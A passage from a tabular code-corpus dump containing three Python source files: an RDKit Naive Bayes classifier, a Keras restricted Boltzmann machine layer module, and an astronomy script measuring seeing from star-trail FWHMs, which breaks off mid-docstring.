text stringlengths 12 1.05M | repo_name stringlengths 5 86 | path stringlengths 4 191 | language stringclasses 1 value | license stringclasses 15 values | size int32 12 1.05M | keyword listlengths 1 23 | text_hash stringlengths 64 64 |
|---|---|---|---|---|---|---|---|
# $Id$
#
# Copyright (C) 2004-2008 Greg Landrum and Rational Discovery LLC
# All Rights Reserved
#
""" Defines Naive Baysean classification model
Based on development in: Chapter 6 of "Machine Learning" by Tom Mitchell
"""
import numpy
from rdkit.ML.Data import Quantize
def _getBinId(val, qBounds) :
bid = 0
for bnd in qBounds:
if (val > bnd) :
bid += 1
return bid
# FIX: this class has not been updated to new-style classes
# (RD Issue380) because that would break all of our legacy pickled
# data. Until a solution is found for this breakage, an update is
# impossible.
class NaiveBayesClassifier :
"""
_NaiveBayesClassifier_s can save the following pieces of internal state, accessible via
standard setter/getter functions:
1) _Examples_: a list of examples which have been predicted
2) _TrainingExamples_: List of training examples - the descriptor value of these examples
are quantized based on info gain using ML/Data/Quantize.py if necessary
3) _TestExamples_: the list of examples used to test the model
4) _BadExamples_ : list of examples that were incorrectly classified
4) _QBoundVals_: Quant bound values for each varaible - a list of lists
5) _QBounds_ : Number of bounds for each variable
"""
def __init__(self, attrs, nPossibleVals,
nQuantBounds, mEstimateVal=-1.0, useSigs=False):
""" Constructor
"""
self._attrs = attrs
self._mEstimateVal = mEstimateVal
self._useSigs=useSigs
self._classProbs = {}
self._examples = []
self._trainingExamples = []
self._testExamples = []
self._badExamples = []
self._QBoundVals = {}
self._nClasses = nPossibleVals[-1]
self._qBounds = nQuantBounds
self._nPosVals = nPossibleVals
self._needsQuant = 1
self._name = ""
self.mprob = -1.0
# for the sake a of efficiency lets try to change the conditional probabities
# to a numpy array instead of a dictionary. The three dimension array is indexed
# on the the activity class, the discriptor ID and the descriptor binID
#self._condProbs = {}
#self._condProbs = numpy.zeros((self._nClasses, max(self._attrs)+1, max(self._nPosVals)+1), 'd')
self._condProbs = [None]*self._nClasses
for i in range(self._nClasses):
if not (hasattr(self,'_useSigs') and self._useSigs):
nA = max(self._attrs)+1
self._condProbs[i] = [None]*nA
for j in range(nA):
nV = self._nPosVals[j]
if self._qBounds[j]:
nV = max(nV,self._qBounds[j]+1)
self._condProbs[i][j] = [0.0]*nV
else:
self._condProbs[i] = {}
for idx in self._attrs:
self._condProbs[i][idx] = [0.0]*2
def GetName(self):
return self._name
def SetName(self, name):
self._name = name
def NameModel(self, varNames) :
self.SetName('NaiveBayesCalssifier')
def GetExamples(self):
return self._examples
def SetExamples(self, examples):
self._examples = examples
def GetTrainingExamples(self):
return self._trainingExamples
def SetTrainingExamples(self,examples):
self._trainingExamples = examples
def GetTestExamples(self) :
return self._testExamples
def SetTestExamples(self, examples) :
self._testExamples = examples
def SetBadExamples(self, examples) :
self._badExamples = examples
def GetBadExamples(self) :
return self._badExamples
def _computeQuantBounds(self) :
neg = len(self._trainingExamples)
natr = len(self._attrs)
# make a list of results and values
allVals = numpy.zeros((neg, natr), 'd')
res = [] # list of y values
i = 0
for eg in self._trainingExamples:
res.append(eg[-1])
j = 0
for ai in self._attrs:
val = eg[ai]
allVals[i,j] = val
j += 1
i += 1
# now loop over each of the columns and compute the bounds
# the number of bounds is determined by the maximum info gain
i = 0
for ai in self._attrs:
nbnds = self._qBounds[ai]
if nbnds > 0 :
mbnds = []
mgain = -1.0
for j in range(1,nbnds+1):
bnds, igain = Quantize.FindVarMultQuantBounds(allVals[:,i], j, res, self._nClasses)
if (igain > mgain) :
mbnds = bnds
mgain = igain
self._QBoundVals[ai] = mbnds
i += 1
def trainModel(self) :
""" We will assume at this point that the training examples have been set
We have to estmate the conditional probabilities for each of the (binned) descriptor
component give a outcome (or class). Also the probabilities for each class is estimated
"""
# first estimate the class probabilities
n = len(self._trainingExamples)
for i in range(self._nClasses):
self._classProbs[i] = 0.0
#for i in range(self._nClasses):
# self._classProbs[i] = float(self._classProbs[i])/n
# first find the bounds for each descriptor value if necessary
if not self._useSigs and max(self._qBounds)>0:
self._computeQuantBounds()
# now compute the probabilities
ncls = {}
incr = 1.0/n
for eg in self._trainingExamples :
cls = eg[-1]
self._classProbs[cls] += incr
ncls[cls] = ncls.get(cls,0)+1
tmp = self._condProbs[cls]
if not self._useSigs:
for ai in self._attrs:
bid = eg[ai]
if self._qBounds[ai] > 0 :
bid = _getBinId(bid, self._QBoundVals[ai])
tmp[ai][bid] += 1.0
else:
for ai in self._attrs:
if eg[1].GetBit(ai):
tmp[ai][1] += 1.0
else:
tmp[ai][0] += 1.0
#for key in self._condProbs:
for cls in range(self._nClasses) :
if not ncls.has_key(cls): continue
#cls = key[0]
tmp = self._condProbs[cls]
for ai in self._attrs:
if not self._useSigs:
nbnds = self._nPosVals[ai]
if (self._qBounds[ai] > 0) :
nbnds = self._qBounds[ai]
else:
nbnds = 2
for bid in range(nbnds):
if self._mEstimateVal <= 0.0 :
# this is simple the fraction of of time this descriptor component assume
# this value for the examples that belong a specific class
#self._condProbs[key] = (float(self._condProbs[key]))/ncls[cls]
tmp[ai][bid] /= ncls[cls]
else :
# this a bit more complicated form - more appropriate for unbalanced data
# see "Machine Learning" by Tom Mitchell section 6.9.1.1
# this is the probability that this descriptor component can take this specific value
# in the lack of any other information is is simply the inverse of the number of
# possible values 'npossible'
# If we quantized this component then
# npossible = 1 + len(self._QBoundVals[ai])
# else if we did no qunatize (the descriptor came quantized)
# npossible = nPossibleVals[ai]
#ai = key[1]
pdesc = 0.0
if self._qBounds[ai] > 0 :
pdesc = 1.0/(1 + len(self._QBoundVals[ai]))
elif (self._nPosVals[ai] > 0) :
pdesc = 1.0/(self._nPosVals[ai])
else :
raise ValueError, 'Neither Bounds set nor data pre-quantized for attribute ' + str(ai)
tmp[ai][bid] += (self._mEstimateVal)*pdesc
tmp[ai][bid] /= (ncls[cls] + self._mEstimateVal)
def ClassifyExamples(self, examples, appendExamples=0):
preds = []
for eg in examples:
pred = self.ClassifyExample(eg, appendExamples)
preds.append(int(pred))
return preds
def GetClassificationDetails(self):
""" returns the probability of the last prediction """
return self.mprob
def ClassifyExample(self, example, appendExamples=0) :
""" Classify an example by summing over the conditional probabilities
The most likely class is the one with the largest probability
"""
if appendExamples:
self._examples.append(example)
clsProb = {}
for key,prob in self._classProbs.iteritems():
clsProb[key] = prob
tmp = self._condProbs[key]
for ai in self._attrs:
if not (hasattr(self,'_useSigs') and self._useSigs):
bid = example[ai]
if self._qBounds[ai] > 0 :
bid = _getBinId(bid, self._QBoundVals[ai])
else:
if example[1].GetBit(ai):
bid=1
else:
bid=0
clsProb[key] *= tmp[ai][bid]
mkey = -1
self.mprob = -1.0
for key,prob in clsProb.iteritems() :
if (prob > self.mprob) :
mkey = key
self.mprob = prob
return mkey
| rdkit/rdkit-orig | rdkit/ML/NaiveBayes/ClassificationModel.py | Python | bsd-3-clause | 8,744 | [
"RDKit"
] | 80a7d2f8272bc24e6fb86ee9c4ff9ed8c4cfd0c3f75004795dd1512e98ae11c3 |
from __future__ import division
import numpy as np
import copy
import inspect
import types as python_types
import marshal
import sys
import warnings
from keras import activations, initializations, regularizers, constraints
from keras import backend as K
from keras.engine import InputSpec, Layer
from keras.layers.core import Dense
from keras_extensions.initializations import glorot_uniform_sigm
from keras_extensions.activations import nrlu
from .backend import random_binomial, random_normal
import theano
import theano.tensor as T
class RBM(Layer):
"""
Bernoulli-Bernoulli Restricted Boltzmann Machine (RBM).
"""
# keras.core.Layer part (modified from keras.core.Dense)
# ------------------------------------------------------
def __init__(self, hidden_dim, init='glorot_uniform',
activation='sigmoid', weights=None,
W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
activity_regularizer=None,
W_constraint=None, bx_constraint=None, bh_constraint=None,
input_dim=None, nb_gibbs_steps=1, persistent=False, batch_size=1,
scaling_h_given_x=1.0, scaling_x_given_h=1.0,
dropout=0.0,
**kwargs):
self.p = dropout
if(0.0 < self.p < 1.0):
self.uses_learning_phase = True
self.supports_masking = True
self.nb_gibbs_steps=nb_gibbs_steps
self.updates = []
self.init = initializations.get(init)
self.activation = activations.get(activation)
self.hidden_dim = hidden_dim
self.input_dim = input_dim
self.batch_size = batch_size
self.scaling_h_given_x = scaling_h_given_x
self.scaling_x_given_h = scaling_x_given_h
self.W_regularizer = regularizers.get(W_regularizer)
self.bx_regularizer = regularizers.get(bx_regularizer)
self.bh_regularizer = regularizers.get(bh_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.bx_constraint = constraints.get(bx_constraint)
self.bh_constraint = constraints.get(bh_constraint)
self.initial_weights = weights
self.input_spec = [InputSpec(ndim=2)]
if self.input_dim:
kwargs['input_shape'] = (self.input_dim,)
super(RBM, self).__init__(**kwargs)
self.W = self.init((input_dim, self.hidden_dim),
name='{}_W'.format(self.name))
self.bx = K.zeros((self.input_dim),
name='{}_bx'.format(self.name))
self.bh = K.zeros((self.hidden_dim),
name='{}_bh'.format(self.name))
self.trainable_weights = [self.W, self.bx, self.bh]
self.is_persistent = persistent
if(self.is_persistent):
self.persistent_chain = theano.shared(np.zeros((self.batch_size, self.input_dim), dtype=theano.config.floatX), borrow=True)
def _get_noise_shape(self, x):
return None
def build(self, input_shape):
assert len(input_shape) == 2
input_dim = input_shape[1]
self.input_spec = [InputSpec(dtype=K.floatx(),
shape=(None, input_dim))]
#self.trainable_weights = [self.W, self.bx, self.bh]
self.regularizers = []
if self.W_regularizer:
self.W_regularizer.set_param(self.W)
self.regularizers.append(self.W_regularizer)
if self.bx_regularizer:
self.bx_regularizer.set_param(self.bx)
self.regularizers.append(self.bx_regularizer)
if self.bh_regularizer:
self.bh_regularizer.set_param(self.bh)
self.regularizers.append(self.bh_regularizer)
if self.activity_regularizer:
self.activity_regularizer.set_layer(self)
self.regularizers.append(self.activity_regularizer)
self.constraints = {}
if self.W_constraint:
self.constraints[self.W] = self.W_constraint
if self.bx_constraint:
self.constraints[self.bx] = self.bx_constraint
if self.bh_constraint:
self.constraints[self.bh] = self.bh_constraint
if self.initial_weights is not None:
self.set_weights(self.initial_weights)
del self.initial_weights
def call(self, x, mask=None):
y = K.dot(self.W, x) + self.bx
output = self.activation(y)
return output
def get_output_shape_for(self, input_shape):
assert input_shape and len(input_shape) == 2
return (input_shape[0], self.hidden_dim)
def get_config(self):
config = {'output_dim': self.hidden_dim,
'init': self.init.__name__,
'activation': self.activation.__name__,
'W_regularizer': self.W_regularizer.get_config() if self.W_regularizer else None,
'bx_regularizer': self.bx_regularizer.get_config() if self.bx_regularizer else None,
'bh_regularizer': self.bh_regularizer.get_config() if self.bh_regularizer else None,
'activity_regularizer': self.activity_regularizer.get_config() if self.activity_regularizer else None,
'W_constraint': self.W_constraint.get_config() if self.W_constraint else None,
'bx_constraint': self.bx_constraint.get_config() if self.bx_constraint else None,
'bh_constraint': self.bh_constraint.get_config() if self.bh_constraint else None,
'persistent': self.is_persistent,
'input_dim': self.input_dim}
base_config = super(Dense, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
# -------------
# RBM internals
# -------------
def free_energy(self, x):
"""
Compute free energy for Bernoulli RBM, given visible units.
The marginal probability p(x) = sum_h 1/Z exp(-E(x, h)) can be re-arranged to the form
p(x) = 1/Z exp(-F(x)), where the free energy F(x) = -sum_j=1^H log(1 + exp(x^T W[:,j] + bh_j)) - bx^T x,
in case of the Bernoulli RBM energy function.
"""
wx_b = K.dot(x, self.W) + self.bh
hidden_term = K.sum(K.log(1 + K.exp(wx_b)), axis=1)
vbias_term = K.dot(x, self.bx)
return -hidden_term - vbias_term
def sample_h_given_x(self, x):
"""
Draw sample from p(h|x).
For Bernoulli RBM the conditional probability distribution can be derived to be
p(h_j=1|x) = sigmoid(x^T W[:,j] + bh_j).
"""
h_pre = K.dot(x, self.W) + self.bh # pre-sigmoid (used in cross-entropy error calculation for better numerical stability)
#h_sigm = K.sigmoid(h_pre) # mean of Bernoulli distribution ('p', prob. of variable taking value 1), sometimes called mean-field value
h_sigm = self.activation(self.scaling_h_given_x * h_pre)
# drop out noise
if(0.0 < self.p < 1.0):
noise_shape = self._get_noise_shape(h_sigm)
h_sigm = K.in_train_phase(K.dropout(h_sigm, self.p, noise_shape), h_sigm)
h_samp = random_binomial(shape=h_sigm.shape, n=1, p=h_sigm)
# random sample
# \hat{h} = 1, if p(h=1|x) > uniform(0, 1)
# 0, otherwise
return h_samp, h_pre, h_sigm
def sample_x_given_h(self, h):
"""
Draw sample from p(x|h).
For Bernoulli RBM the conditional probability distribution can be derived to be
p(x_i=1|h) = sigmoid(W[i,:] h + bx_i).
"""
# pre-sigmoid (used in cross-entropy error calculation for better numerical stability)
x_pre = K.dot(h, self.W.T) + self.bx
# mean of Bernoulli distribution ('p', prob. of variable taking value 1), sometimes called mean-field value
x_sigm = K.sigmoid(self.scaling_x_given_h * x_pre)
#x_sigm = self.activation(self.scaling_x_given_h * x_pre)
x_samp = random_binomial(shape=x_sigm.shape, n=1, p=x_sigm)
# random sample
# \hat{x} = 1, if p(x=1|h) > uniform(0, 1)
# 0, otherwise
# pre and sigm are returned to compute cross-entropy
return x_samp, x_pre, x_sigm
def gibbs_xhx(self, x0):
"""
Perform one step of Gibbs sampling, starting from visible sample.
h1 ~ p(h|x0)
x1 ~ p(x|h1)
"""
h1, h1_pre, h1_sigm = self.sample_h_given_x(x0)
x1, x1_pre, x1_sigm = self.sample_x_given_h(h1)
# pre and sigm are returned to compute cross-entropy
return x1, x1_pre, x1_sigm
def mcmc_chain(self, x, nb_gibbs_steps):
"""
Perform Markov Chain Monte Carlo, run k steps of Gibbs sampling,
starting from visible data, return point estimate at end of chain.
x0 (data) -> h1 -> x1 -> ... -> xk (reconstruction, negative sample)
"""
xi = x
for i in xrange(nb_gibbs_steps):
xi, xi_pre, xi_sigm = self.gibbs_xhx(xi)
x_rec, x_rec_pre, x_rec_sigm = xi, xi_pre, xi_sigm
x_rec = theano.gradient.disconnected_grad(x_rec) # avoid back-propagating gradient through the Gibbs sampling
# this is similar to T.grad(.., consider_constant=[chain_end])
# however, as grad() is called in keras.optimizers.Optimizer,
# we do it here instead to avoid having to change Keras' code
return x_rec, x_rec_pre, x_rec_sigm
def contrastive_divergence_loss(self, x, dummy):
"""
Compute contrastive divergence loss with k steps of Gibbs sampling (CD-k).
Result is a Theano expression with the form loss = f(x).
"""
if(self.is_persistent):
#self.persistent_chain = theano.shared(np.random.randint(0, 1, (self.batch_size, self.input_dim)).astype('f'), borrow=True)
#self.persistent_chain = theano.shared(np.zeros((self.batch_size, self.input_dim)).astype('f'), borrow=True)
chain_start = self.persistent_chain
else:
chain_start = x
def loss(chain_start, x):
x_rec, _, _ = self.mcmc_chain(chain_start, self.nb_gibbs_steps)
cd = K.mean(self.free_energy(x)) - K.mean(self.free_energy(x_rec))
return cd, x_rec
y, x_rec = loss(chain_start, x)
if(self.is_persistent):
self.updates = [(self.persistent_chain, x_rec)]
return y
def reconstruction_loss(self, x, dummy):
"""
Compute binary cross-entropy between the binary input data and the reconstruction generated by the model.
Result is a Theano expression with the form loss = f(x).
Useful as a rough indication of training progress (see Hinton2010).
Summed over feature dimensions, mean over samples.
"""
def loss(x):
_, pre, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
# NOTE:
# when computing log(sigmoid(x)) and log(1 - sigmoid(x)) of cross-entropy,
# if x is very big negative, sigmoid(x) will be 0 and log(0) will be nan or -inf
# if x is very big positive, sigmoid(x) will be 1 and log(1-0) will be nan or -inf
# Theano automatically rewrites this kind of expression using log(sigmoid(x)) = -softplus(-x), which
# is more stable numerically
# however, as the sigmoid() function used in the reconstruction is inside a scan() operation, Theano
# doesn't 'see' it and is not able to perform the change; as a work-around we use pre-sigmoid value
# generated inside the scan() and apply the sigmoid here
#
# NOTE:
# not sure how important this is; in most cases seems to work fine using just T.nnet.binary_crossentropy()
# for instance; keras.objectives.binary_crossentropy() simply clips the value entering the log(); and
# this is only used for monitoring, not calculating gradient
cross_entropy_loss = -T.mean(T.sum(x*T.log(T.nnet.sigmoid(pre)) + (1 - x)*T.log(1 - T.nnet.sigmoid(pre)), axis=1))
#cross_entropy_loss = -T.mean(T.sum(x*T.log(self.activation(pre)) + (1 - x)*T.log(1 - self.activation(pre)), axis=1))
return cross_entropy_loss
y = loss(x)
return y
def free_energy_gap(self, x_train, x_test):
"""
Computes the free energy gap between train and test set, F(x_test) - F(x_train).
In order to avoid overfitting, we cannot directly monitor if the probability of held out data is
starting to decrease, due to the partition function.
We can however compute the ratio p(x_train)/p(x_test), because here the partition functions cancel out.
This ratio should be close to 1, if it is > 1, the model may be overfitting.
The ratio can be compute as,
r = p(x_train)/p(x_test) = exp(-F(x_train) + F(x_test)).
Alternatively, we compute the free energy gap,
gap = F(x_test) - F(x_train),
where F(x) indicates the mean free energy of test data and a representative subset of
training data respectively.
The gap should around 0 normally, but when it starts to grow, the model may be overfitting.
However, even when the gap is growing, the probability of the training data may be growing even faster,
so the probability of the test data may still be improving.
See: Hinton, "A Practical Guide to Training Restricted Boltzmann Machines", UTML TR 2010-003, 2010, section 6.
"""
return T.mean(self.free_energy(x_train)) - T.mean(self.free_energy(x_test))
def get_h_given_x_layer(self, as_initial_layer=False):
"""
Generates a new Dense Layer that computes mean of Bernoulli distribution p(h|x), ie. p(h=1|x).
"""
if as_initial_layer:
layer = Dense(input_dim=self.input_dim, output_dim=self.hidden_dim, activation=self.activation, weights=[self.W.get_value(), self.bh.get_value()])
else:
layer = Dense(output_dim=self.hidden_dim, activation=self.activation, weights=[self.W.get_value(), self.bh.get_value()])
return layer
def get_x_given_h_layer(self, as_initial_layer=False):
"""
Generates a new Dense Layer that computes mean of Bernoulli distribution p(x|h), ie. p(x=1|h).
"""
if as_initial_layer:
layer = Dense(input_dim=self.hidden_dim, output_dim=self.input_dim, activation='sigmoid', weights=[self.W.get_value().T, self.bx.get_value()])
else:
layer = Dense(output_dim=self.input_dim, activation='sigmoid', weights=[self.W.get_value().T, self.bx.get_value()])
return layer
def return_reconstruction_data(self, x):
def re_sample(x):
x_rec, pre, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
return x_rec
y = re_sample(x)
return y
class GBRBM(RBM):
"""
Gaussian-Bernoulli Restricted Boltzmann Machine (GB-RBM).
This GB-RBM does not learn variances of Gaussian units, but instead fixes them to 1 and
uses noise-free reconstructions. Input data should be pre-processed to have zero mean
and unit variance along the feature dimensions.
See: Hinton, "A Practical Guide to Training Restricted Boltzmann Machines", UTML TR 2010-003, 2010, section 13.2.
"""
def __init__(self, hidden_dim, init='glorot_uniform',
activation='sigmoid', weights=None,
W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
activity_regularizer=None,
W_constraint=None, bx_constraint=None, bh_constraint=None,
input_dim=None, nb_gibbs_steps=1, persistent=True, batch_size=1, scaling_h_given_x=1.0, scaling_x_given_h=1.0,
dropout=0.0,
**kwargs):
self.nb_gibbs_steps=nb_gibbs_steps
super(GBRBM, self).__init__(hidden_dim=hidden_dim, init=init,
activation=activation, weights=weights,
input_dim=input_dim, nb_gibbs_steps=nb_gibbs_steps,
scaling_h_given_x=scaling_h_given_x,
scaling_x_given_h=scaling_x_given_h,
persistent=persistent, batch_size=batch_size,
dropout=dropout,
**kwargs)
# inherited RBM functions same as BB-RBM
# -------------
# RBM internals
# -------------
def free_energy(self, x):
wx_b = K.dot(x, self.W) + self.bh
vbias_term = 0.5*K.sum((x - self.bx)**2, axis=1)
hidden_term = K.sum(K.log(1 + K.exp(wx_b)), axis=1)
return -hidden_term + vbias_term
# sample_h_given_x() same as BB-RBM
def sample_x_given_h(self, h):
"""
Draw sample from p(x|h).
For Gaussian-Bernoulli RBM the conditional probability distribution can be derived to be
p(x_i|h) = norm(x_i; sigma_i W[i,:] h + bx_i, sigma_i^2).
"""
x_mean = K.dot(h, self.W.T) + self.bx
x_samp = self.scaling_x_given_h * x_mean
# variances of the Gaussian units are not learned,
# instead we fix them to 1 in the energy function
# here, instead of sampling from the Gaussian distributions,
# we simply take their means; we'll end up with a noise-free reconstruction
# here last two returns are dummy variables related to Bernoulli RBM base class (returning e.g. x_samp, None, None doesn't work)
return x_samp, x_samp, x_samp
# gibbs_xhx() same as BB-RBM
# mcmc_chain() same as BB-RBM
def reconstruction_loss(self, x, dummy):
"""
Compute mean squared error between input data and the reconstruction generated by the model.
Result is a Theano expression with the form loss = f(x).
Useful as a rough indication of training progress (see Hinton2010).
Mean over samples and feature dimensions.
"""
def loss(x):
x_rec, _, _ = self.mcmc_chain(x, self.nb_gibbs_steps)
return K.mean(K.sqrt(x - x_rec))
return loss(x)
# free_energy_gap() same as BB-RBM
# get_h_given_x_layer() same as BB-RBM
def get_x_given_h_layer(self, as_initial_layer=False):
"""
Generates a new Dense Layer that computes mean of Gaussian distribution p(x|h).
"""
if not as_initial_layer:
layer = Dense(output_dim=self.input_dim, activation='linear', weights=[self.W.get_value().T, self.bx.get_value()])
else:
layer = Dense(input_dim=self.hidden_dim, output_dim=self.input_dim, activation='linear', weights=[self.W.get_value().T, self.bx.get_value()])
return layer
class GNRRBM(GBRBM):
def __init__(self, hidden_dim, init='glorot_uniform',
activation='sigmoid', weights=None,
W_regularizer=None, bx_regularizer=None, bh_regularizer=None,
activity_regularizer=None,
W_constraint=None, bx_constraint=None, bh_constraint=None,
input_dim=None, nb_gibbs_steps=1, persistent=True, batch_size=1,
scaling_h_given_x=1.0, scaling_x_given_h=1.0,
dropout=0.0,
**kwargs):
self.nb_gibbs_steps=nb_gibbs_steps
super(GNRRBM, self).__init__(hidden_dim=hidden_dim, init=init,
activation=activation, weights=weights,
input_dim=input_dim, nb_gibbs_steps=1,
scaling_h_given_x=scaling_h_given_x,
scaling_x_given_h=scaling_x_given_h,
persistent=False, batch_size=batch_size,
dropout=dropout,
**kwargs)
# inherited RBM functions same as BB-RBM
# -------------
# RBM internals
# -------------
def sample_h_given_x(self, x):
h_pre = K.dot(x, self.W) + self.bh
h_sigm = K.maximum(self.scaling_h_given_x * h_pre, 0)
#std = K.mean(K.sigmoid(self.scaling_h_given_x * h_pre))
#eta = random_normal(shape=h_pre.shape, std=std)
#h_samp = K.maximum(h_pre + eta, 0)
h_samp = nrlu(h_pre)
return h_samp, h_pre, h_sigm
def sample_x_given_h(self, h):
x_mean = K.dot(h, self.W.T) + self.bx
x_samp = self.scaling_x_given_h * x_mean
return x_samp, x_samp, x_samp
def get_h_given_x_layer(self, as_initial_layer=False):
"""
Generates a new Dense Layer that computes mean of Bernoulli distribution p(h|x), ie. p(h=1|x).
"""
if as_initial_layer:
layer = Dense(input_dim=self.input_dim, output_dim=self.hidden_dim, activation="relu", weights=[self.W.get_value(), self.bh.get_value()])
else:
layer = Dense(output_dim=self.hidden_dim, activation="relu", weights=[self.W.get_value(), self.bh.get_value()])
return layer
| bnsnapper/keras_extensions | keras_extensions/rbm.py | Python | mit | 21,081 | [
"Gaussian"
] | d17273b8229d057e1b08f32e3b9dab00e48f600720c12d0f316de6c292dcab62 |
#!/usr/bin/python
# coding=utf-8
__author__ = 'Didier Walliang'
import math
import numpy as np
import matplotlib.pyplot as plt
import os.path
from matplotlib import dates
from astropy.io import fits
from astropy.modeling import models, fitting
from astropy.convolution import Gaussian2DKernel
from astropy.stats import gaussian_fwhm_to_sigma
from astropy import units as u
from astropy.time import Time
from photutils import segment_properties
from photutils import detect_sources
from photutils import detect_threshold
# class definitions
class Slice:
"""Slice of a star trail"""
def __init__(self, positions, intensities, approximate_fwhm_px = 6.0):
"""
Construct a Slice object.
:param positions: list of the position of each intensity in the image
:param intensities: list of intensities in ADU
:param approximate_fwhm_px: float, approximate FWHM in pixel to help to fit the gaussian
:return:
"""
self.positions = positions
self.intensities = intensities
self.approximative_fwhm_px = approximate_fwhm_px
# move the y data to the axis to allow the fitting
# (because the fitting doesn't work if the data are not near the x axis)
min_intensity = min(self.intensities)
self.relative_intensities = self.intensities - min_intensity
def print_positions(self):
print "positions = %s " % self.positions
def print_intensities(self):
print "intensities = %s " % self.intensities
def print_relative_intensities(self):
print "relative intensities = %s " % self.relative_intensities
def fit_gaussian(self):
"""Fit the data using a Gaussian"""
max_relative_intensity = max(self.relative_intensities)
mean_position = sum(self.positions)/len(self.positions)
approximate_stddev = self.approximative_fwhm_px / (2 * np.sqrt(2 * np.log(2)))
gaussian_init = models.Gaussian1D(amplitude=max_relative_intensity, mean=mean_position, stddev=approximate_stddev)
fit_gaussian = fitting.LevMarLSQFitter()
self.gaussian = fit_gaussian(gaussian_init, self.positions, self.relative_intensities)
def fwhm_from_gaussian(self):
"""FWHM calculation with the best-fit model"""
sigma = self.gaussian.stddev.value
self.fwhm_in_px = 2 * np.sqrt(2 * np.log(2)) * sigma
def print_graph(self):
# 200 dots from first to last position to have a smooth bell curve
first_position = self.positions[0]
last_position = self.positions[len(self.positions)-1]
finer_positions = np.linspace(first_position, last_position, 200)
plt.figure(1)
plt.plot(self.positions, self.relative_intensities, 'ko')
plt.plot(finer_positions, self.gaussian(finer_positions))
plt.xlabel('Position (pixel)')
plt.ylabel('Relative intensity (ADU)')
plt.show()
class StarTrail:
"""A star trail"""
def __init__(self, startrailcoordinates, img_data, sampling):
"""
Construct a StarTrail object.
:param startrailcoordinates: StarTrailCoordinates object
Coordinates of the star trail in the image
:param img_data: HDU object
:param sampling: sampling in arcsec by pixel
:return:
"""
self.xmin = startrailcoordinates.xmin
self.xmax = startrailcoordinates.xmax
self.ymin = startrailcoordinates.ymin
self.ymax = startrailcoordinates. ymax
self.img_data = img_data
self.sampling = sampling
self.fwhms = np.array([])
def calculate_fwhms(self):
"""Calcultate the FWHMs along the star trail"""
self.fwhms = np.array([])
for y in range(self.ymin, self.ymax):
x_positions = np.array([])
intensities = np.array([])
for x in range(self.xmin, self.xmax):
x_positions = np.append(x_positions, x)
intensities = np.append(intensities, self.img_data[y, x])
slice = Slice(x_positions, intensities)
slice.fit_gaussian()
slice.fwhm_from_gaussian()
#slice.print_graph()
fwhm_in_arcsec = self.sampling * slice.fwhm_in_px
#print "FWHM in pixels : %f" % slice.fwhmInPx
#print "FWHM in arcsec : %f" % fwhm_in_arcsec
self.fwhms = np.append(self.fwhms, fwhm_in_arcsec)
self.fwhm_samples = self.fwhms.size
self.fwhm_min = np.min(self.fwhms)
self.fwhm_max = np.max(self.fwhms)
self.fwhm_mean = np.mean(self.fwhms)
self.fwhm_median = np.median(self.fwhms)
self.fwhm_stddev = np.std(self.fwhms)
def print_fwhms_results(self):
"""Print the min, max, mean, median and standard deviation of the FWHMs measurement"""
print "Samples = %i " % self.fwhm_samples
print "FWHM min = %f arcsec " % self.fwhm_min
print "FWHM max = %f arcsec " % self.fwhm_max
print "FWHM mean = %f arcsec " % self.fwhm_mean
print "FWHM median = %f arcsec " % self.fwhm_median
print "FWHM standard deviation = %f arcsec " % self.fwhm_stddev
def print_fwhms_graph(self):
"""Plot the FWHM with the best-fit model along the star trail"""
plt.figure(1)
plt.plot(self.fwhms, 'ko')
plt.xlabel('Measure number')
plt.ylabel('FWHM (arcsec)')
plt.show()
class StarTrailCoordinates:
def __init__(self, xmin, xmax, ymin, ymax):
self.xmin = xmin
self.xmax = xmax
self.ymin = ymin
self.ymax = ymax
def __str__(self):
return "xmin = %i ; xmax = %i ; ymin = %i ; ymax = %i" % (self.xmin, self.xmax, self.ymin, self.ymax)
class TrailsImage:
"""An image containing star trails"""
def __init__(self, data, sampling, target_fwhm_arcsec, length_x_axis):
"""
Construct a TrailsImage object.
:param data: HDU object
:param sampling: sampling in arcsec by pixel
:param target_fwhm_arcsec: estimated FWHM in arcsec (to help the calcultation)
:param length_x_axis: length of X axis
:return:
"""
self.data = data
self.sampling = sampling
self.target_fwhm_arcsec = target_fwhm_arcsec
self.length_x_axis = length_x_axis
def search_trails(self):
"""Search star trails in image"""
threshold = detect_threshold(self.data, snr=1)
sigma = 2.0 * gaussian_fwhm_to_sigma
kernel = Gaussian2DKernel(sigma, x_size=3, y_size=3)
self.segments = detect_sources(self.data, threshold, npixels=1000, filter_kernel=kernel)
self.segments_properties = segment_properties(self.data, self.segments)
def nb_trails(self):
"""
Give the number of trails detected
:return: number of trails detected
"""
return len(self.segments_properties)
def calculate_fwhm(self):
"""Measure the FWHM of the star trails"""
self.trails_fwhm = np.array([])
self.trails_stddev = np.array([])
# for each star trail
for properties in self.segments_properties:
# x coordinate of the middle of the trail
xmiddle = (properties.xmax + properties.xmin)/2
target_fwhm_px = self.target_fwhm_arcsec/self.sampling
xmin = int(math.floor(xmiddle.value - target_fwhm_px*2))
xmax = int(math.ceil(xmiddle.value + target_fwhm_px*2))
if(xmin < 1 or xmax > self.length_x_axis):
continue
ymin = int(properties.ymin.value)
ymax = int(properties.ymax.value)
startrailcoord = StarTrailCoordinates(xmin, xmax, ymin, ymax)
#print startrailcoord
startrail = StarTrail(startrailcoord, self.data, self.sampling)
startrail.calculate_fwhms()
#startrail.print_fwhms_results()
#startrail.print_fwhms_graph()
median_trail_fwhm = startrail.fwhm_median
self.trails_fwhm = np.append(self.trails_fwhm, median_trail_fwhm)
self.trails_stddev = np.append(self.trails_stddev, startrail.fwhm_stddev)
def mean_fwhm(self):
"""Give the mean FWHM of the trails"""
return np.mean(self.trails_fwhm)
def mean_stddev(self):
"""Give the standard deviation of the FWHM of the trails"""
return np.mean(self.trails_stddev)
# ################
# Main program
# ################
def main(directory, file_prefix, file_suffix, number_of_files, result_file, show_error_bar = False, sampling = 1, location='', instrument=''):
"""
Measure the seeing of a sequence of images
:param directory: the directory where the image files are located (with a slash or backslash at the end)
:param file_prefix: beginning of the name of the files (example: 'seeing-')
:param file_suffix: end of the name of the files (with extension) (example: '.fit')
It is assumed that the file format is FITS.
:param number_of_files: the number of files (begins with 1 and ends with this number).
